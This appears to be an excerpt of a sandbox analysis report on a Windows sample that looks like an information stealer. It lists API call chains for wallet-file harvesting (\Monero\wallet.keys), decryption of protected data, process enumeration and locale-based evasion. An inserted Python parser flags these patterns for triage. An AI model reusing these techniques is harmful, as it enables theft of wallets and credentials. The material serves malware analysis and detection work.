                          • String ID: 'j[$0~ |$9IE$AQ$DOXK$a%@s$u?~$ub}
                          • API String ID: 0-250917369
                          • Opcode ID: cc922f6930b7667376268f790abdd0794b4aa7b61ac6c1a8105e81eb6e2ba3b8
                          • Instruction ID: 8e6c4b7e374ade9111118e2b43d5a544f625809215d83e3f413e07585452d29a
                          • Opcode Fuzzy Hash: cc922f6930b7667376268f790abdd0794b4aa7b61ac6c1a8105e81eb6e2ba3b8
                          • Instruction Fuzzy Hash: F1B229F390C204AFE3146E2DEC8567ABBE9EF94720F1A493DEAC4C3744E63558058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: !pC\$<:Sk$[37$ebw[$le]$+kO$8^t$7
                          • API String ID: 0-1760684657
                          • Opcode ID: 70de5e199ad2c3789d753eeb36a7e32cc84eeab87662eed9e8a1990a85ab1c5b
                          • Instruction ID: 24237312aa7cc146f420aca5424fa28820601e3a10d806fb2d100b5811133de5
                          • Opcode Fuzzy Hash: 70de5e199ad2c3789d753eeb36a7e32cc84eeab87662eed9e8a1990a85ab1c5b
                          • Instruction Fuzzy Hash: 1EB207F36086049FE304AE2DEC8567AFBE5EF94320F164A3DEAC4C3744E63599058697
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: '{F$+Nw$34gv$Jc~$MS.I$bP~_$dtM~$6}
                          • API String ID: 0-1837467796
                          • Opcode ID: 06efa043235126c68abad3efc69ac66f3546f530a67530b19618790c55a9f0a0
                          • Instruction ID: f4cff5ffa0104f93d145adc5dc308a5ce51dbcec8fed81adabc2d1a2d98bf999
                          • Opcode Fuzzy Hash: 06efa043235126c68abad3efc69ac66f3546f530a67530b19618790c55a9f0a0
                          • Instruction Fuzzy Hash: EDB217F360C2049FE3046E29EC8567AFBE9EFD4320F1A893DE6C583744E67558058796
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                          • GetKeyboardLayoutList.USER32(00000000,00000000,001805AF), ref: 00177BE1
                          • LocalAlloc.KERNEL32(00000040,?), ref: 00177BF9
                          • GetKeyboardLayoutList.USER32(?,00000000), ref: 00177C0D
                          • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00177C62
                          • LocalFree.KERNEL32(00000000), ref: 00177D22
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                          • String ID: /
                          • API String ID: 3090951853-4001269591
                          • Opcode ID: 42667d083985f1fd3c80a88da5996c9cee8ccff6df2c2aa2a8b9cb7c237524c8
                          • Instruction ID: 84bb8e11dfb60a791d9d0b0677cd0b84efe9556f03cc601089ee7fd0d162fa9e
                          • Opcode Fuzzy Hash: 42667d083985f1fd3c80a88da5996c9cee8ccff6df2c2aa2a8b9cb7c237524c8
                          • Instruction Fuzzy Hash: DC413D71940218ABDB24DB94DC99FEEB778FF58700F608199E10DA6191DB342F85CFA2
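The function records above follow two recurring shapes that an analyst triaging this report wants to pick out mechanically: the FindFirstFileA / StrCmpCA / FindNextFileA / FindClose directory walk (with a `\*.*` pattern, a `\Monero\wallet.keys` path built in a subcall, and in one record a CopyFileA + DeleteFileA pair), and the GetKeyboardLayoutList / GetLocaleInfoA loop that the report's "evasive API chain (may stop execution after checking locale)" signature refers to. The parser below is an added example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling. It reads the record lines exactly as printed on this page, turns them into structured calls, and applies rules for both shapes. Two things in it are assumptions rather than facts from the page: the two StrCmpCA calls are read as the usual "." / ".." skip (the report shows only string addresses, not their contents), and the `$` in the `String ID` line is taken as the report's separator between several strings, as the other records on this page suggest. LCType `0x00000002` is `LOCALE_SLANGUAGE`; that value is a documented Windows constant.

```python
"""Parse Joe Sandbox per-function API listings and flag stealer behaviour patterns.
Added example, not part of the report; sample records are copied from the report."""
from __future__ import annotations

import re
from dataclasses import dataclass

# One call line of a function record, with or without the "Part of subcall" prefix, e.g.
#   • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00180C2E), ref: 0016DE5E
#   • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# "String ID" line of the Similarity section; assumed: several strings are joined with '$'.
STRING_LINE = re.compile(r"^\s*•\s*String ID:\s*(?P<strings>.*?)\s*$")

TARGET_ARTIFACTS = ("wallet.keys", "prefs.js")  # Monero wallet keys, Firefox profile prefs
LOCALE_SLANGUAGE = "00000002"                   # LCType 0x2: localized language name


@dataclass
class ApiCall:
    api: str
    module: str
    args: list[str]
    ref: str                    # call-site address
    subcall: str | None = None  # callee that contains the call; None for a direct call


@dataclass
class FunctionRecord:
    calls: list[ApiCall]
    strings: list[str]


def parse_record(text: str) -> FunctionRecord:
    """Turn the text of one function record into structured calls and referenced strings."""
    calls: list[ApiCall] = []
    strings: list[str] = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            args = [a for a in m.group("args").split(",") if a]
            calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref"), m.group("sub")))
            continue
        s = STRING_LINE.match(line)
        if s and s.group("strings"):
            strings.extend(s.group("strings").split("$"))
    return FunctionRecord(calls, strings)


def classify(rec: FunctionRecord) -> list[str]:
    """Return readable findings for the call shapes visible in this report's records."""
    direct = {c.api for c in rec.calls if c.subcall is None}
    literals = [a for c in rec.calls for a in c.args] + rec.strings
    findings: list[str] = []
    if {"FindFirstFileA", "FindNextFileA"} <= direct:
        findings.append("directory-walk loop (FindFirstFileA/FindNextFileA)")
        if "StrCmpCA" in direct:
            # Two compares per entry right after FindFirstFileA; assumed to skip "." and "..".
            findings.append("name compare inside the loop (assumed: skipping . and ..)")
        if "\\*.*" in literals:
            findings.append("wildcard \\*.* matches every entry")
        if {"CopyFileA", "DeleteFileA"} <= direct:
            findings.append("copy-then-delete: staging harvested files")
    for target in sorted({a for a in literals if a.endswith(TARGET_ARTIFACTS)}):
        findings.append(f"builds a path to {target}")
    if {"GetKeyboardLayoutList", "GetLocaleInfoA"} <= direct:
        # First GetKeyboardLayoutList(0, NULL) sizes the list, the second fills the LocalAlloc buffer,
        # then GetLocaleInfoA is asked for the language name of each layout.
        lctypes = {c.args[1] for c in rec.calls if c.api == "GetLocaleInfoA" and len(c.args) > 1}
        which = "LOCALE_SLANGUAGE" if LOCALE_SLANGUAGE in lctypes else "LCType " + ",".join(sorted(lctypes))
        findings.append(f"locale check: {which} for each installed keyboard layout")
    return findings


# Copied from the report's records (trimmed); raw strings keep the backslashes intact.
HARVEST_RECORD = r"""
  • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,0018510C,?,?,?,001851B4,?,?,00000000,?,00000000), ref: 00161923
  • StrCmpCA.SHLWAPI(?,0018525C), ref: 00161973
  • StrCmpCA.SHLWAPI(?,00185304), ref: 00161989
  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00161D40
  • DeleteFileA.KERNEL32(00000000), ref: 00161DCA
  • FindNextFileA.KERNEL32(000000FF,?), ref: 00161E20
  • FindClose.KERNEL32(000000FF), ref: 00161E32
  • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
  • String ID: \*.*
"""
LOCALE_RECORD = r"""
  • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
  • GetKeyboardLayoutList.USER32(00000000,00000000,001805AF), ref: 00177BE1
  • LocalAlloc.KERNEL32(00000040,?), ref: 00177BF9
  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00177C0D
  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00177C62
  • LocalFree.KERNEL32(00000000), ref: 00177D22
"""

if __name__ == "__main__":
    for name, record in (("harvest", HARVEST_RECORD), ("locale", LOCALE_RECORD)):
        for finding in classify(parse_record(record)):
            print(f"{name}: {finding}")
```

Subcall lines are kept in the parse but excluded from the `direct` set on purpose: the `lstrcpy`/`lstrcat` helpers at 0017A740, 0017A920, 0017A9B0 and 0017A8A0 are shared by every directory-walk record on this page, so matching on them would make each record look the same; the strings they carry (the `\Monero\wallet.keys` path) are still used for the target-artifact finding.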
                          APIs
                            • Part of subcall function 0017A740: lstrcpy.KERNEL32(00180E17,00000000), ref: 0017A788
                            • Part of subcall function 0017A920: lstrcpy.KERNEL32(00000000,?), ref: 0017A972
                            • Part of subcall function 0017A920: lstrcat.KERNEL32(00000000), ref: 0017A982
                            • Part of subcall function 0017A9B0: lstrlen.KERNEL32(?,00CC9188,?,\Monero\wallet.keys,00180E17), ref: 0017A9C5
                            • Part of subcall function 0017A9B0: lstrcpy.KERNEL32(00000000), ref: 0017AA04
                            • Part of subcall function 0017A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0017AA12
                            • Part of subcall function 0017A8A0: lstrcpy.KERNEL32(?,00180E17), ref: 0017A905
                          • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00180D73), ref: 0016E4A2
                          • StrCmpCA.SHLWAPI(?,001814F8), ref: 0016E4F2
                          • StrCmpCA.SHLWAPI(?,001814FC), ref: 0016E508
                          • FindNextFileA.KERNEL32(000000FF,?), ref: 0016EBDF
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                          • String ID: \*.*
                          • API String ID: 433455689-1173974218
                          • Opcode ID: 66b1ed18e1a79b5e594b3391a8b91ab8ed11ae139ec16f30388173f70c3fe1c7
                          • Instruction ID: ab496e38fb26cb66e20d2b91b7a3b0e90d6cc296e402691ed2b3acbaf0cb4512
                          • Opcode Fuzzy Hash: 66b1ed18e1a79b5e594b3391a8b91ab8ed11ae139ec16f30388173f70c3fe1c7
                          • Instruction Fuzzy Hash: 111215729101189ADB19FB70DC96EEE7378AFA4301FC085A9B51E96091EF305F49CF92
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID: ]w$pl7${2k/${2k/$?
                          • API String ID: 0-878772045
                          • Opcode ID: 0d66f3566d604ce6fcf612012f3e3c5bd5041c8d6b193407446db66682c5a068
                          • Instruction ID: 59183061bd5fe48ce1b0470886dcf364240099a505123049a8dea330613ffb28
                          • Opcode Fuzzy Hash: 0d66f3566d604ce6fcf612012f3e3c5bd5041c8d6b193407446db66682c5a068
                          • Instruction Fuzzy Hash: C4B2F7F360C200AFE704AE2DEC8567ABBE9EF94720F1A493DE6C4C3744E63558458697
                          APIs
                          • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0016C871
                          • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0016C87C
                          • lstrcat.KERNEL32(?,00180B46), ref: 0016C943
                          • lstrcat.KERNEL32(?,00180B47), ref: 0016C957
                          • lstrcat.KERNEL32(?,00180B4E), ref: 0016C978
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$BinaryCryptStringlstrlen
                          • String ID:
                          • API String ID: 189259977-0
                          • Opcode ID: faacd605f62d96ffec04f19c1138deb377415d679c6172e68c45c8bb64faf03f
                          • Instruction ID: 40f91728d8a2119c75807efea6cfa0940fb7038c30586c834df03ae7813c59d5
                          • Opcode Fuzzy Hash: faacd605f62d96ffec04f19c1138deb377415d679c6172e68c45c8bb64faf03f
                          • Instruction Fuzzy Hash: D6418DB590421EDBDB10DFA0DD89BFEB7B8BB48304F1041A8E509A7280D7745B84CF92
                          APIs
                          • GetSystemTime.KERNEL32(?), ref: 0017696C
                          • sscanf.NTDLL ref: 00176999
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001769B2
                          • SystemTimeToFileTime.KERNEL32(?,00000000), ref: 001769C0
                          • ExitProcess.KERNEL32 ref: 001769DA
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$System$File$ExitProcesssscanf
                          • String ID:
                          • API String ID: 2533653975-0
                          • Opcode ID: a555f768a7ff21229f2b8798eeec7a9fb90c64d2bc68733047f0839b61d42dc9
                          • Instruction ID: 688bfcc258011a0e92db8565618b3bfd24df5892d7b3bb089a3e75fc325db410
                          • Opcode Fuzzy Hash: a555f768a7ff21229f2b8798eeec7a9fb90c64d2bc68733047f0839b61d42dc9
                          • Instruction Fuzzy Hash: F021CB76D14208AFCF49EFE4D9459EEB7B9BF48300F04852AE51AE3250EB345609CBA5
                          APIs
                          • GetProcessHeap.KERNEL32(00000008,00000400), ref: 0016724D
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00167254
                          • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 00167281
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 001672A4
                          • LocalFree.KERNEL32(?), ref: 001672AE
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                          • String ID:
                          • API String ID: 2609814428-0
                          • Opcode ID: 04b54ac22889a0d0cbba2f2f9f2305c8a11190000e1426ed6b79d3d355fe074a
                          • Instruction ID: 99006f38669f4d6804e0f6289bb420e3f0146ea16f08eee7896719f647897800
                          • Opcode Fuzzy Hash: 04b54ac22889a0d0cbba2f2f9f2305c8a11190000e1426ed6b79d3d355fe074a
                          • Instruction Fuzzy Hash: 580100B5A40208BBDB15DFD4CD49F9E77BCAB44B04F104158FB05AA2C0D774AA00CB65
                          APIs
                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0017961E
                          • Process32First.KERNEL32(00180ACA,00000128), ref: 00179632
                          • Process32Next.KERNEL32(00180ACA,00000128), ref: 00179647
                          • StrCmpCA.SHLWAPI(?,00000000), ref: 0017965C
                          • CloseHandle.KERNEL32(00180ACA), ref: 0017967A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.000000000021D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000242000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.00000000003AA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000543000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000061D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.0000000000645000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000064B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2153810726.000000000065B000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155154997.000000000065C000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2155496811.00000000007F6000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2156048984.00000000007F7000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_160000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                          • String ID:
                          • API String ID: 420147892-0
                          • Opcode ID: dc3fea168cf91789667ac39a40bf700d38224130103cbb28d722156665928a55
                          • Instruction ID: 9e9039e9f870b28f28182393c3066cc2e9fb64b91025fb275ccc70fbd88ce2bd
                          • Opcode Fuzzy Hash: dc3fea168cf91789667ac39a40bf700d38224130103cbb28d722156665928a55
                          • Instruction Fuzzy Hash: 69011EB5A00208EBCB15DFA5CD48BEEBBFCEB48300F108288B90A97240E7359B44DF51
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2153810726.00000000003BE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00160000, based on PE: true
                          • Associated: 00000000.00000002.2152147677.0000000000160000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000161000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2152271112.0000000000211000.00000040.00000001.01000000.00000003.sdmp
